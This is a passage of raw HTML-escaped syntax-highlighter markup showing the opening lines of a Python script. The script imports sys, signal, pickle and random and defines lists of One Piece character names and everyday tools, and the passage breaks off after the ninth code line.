class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-139&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;139&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-140&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;140&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-141&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;141&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-142&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;142&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-143&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;143&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-144&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;144&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-145&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;145&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c67721bbf3b5004813667-146&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;146&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 1401px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;#!/usr/bin/python -u&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;import&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;sys&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;import&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;signal&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;import&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;pickle&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;from&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;random&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;import&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;choice&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;shuffle&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworkers_list&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'James'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Nami'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Luffy'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Zoro'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Tony'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Robin'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Franky'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Brook'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Ace'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Jinbe'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Crocodile'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;tools_list&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'drill'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'Knife'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'gun'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'spoon'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'book'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;'lighter'&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; 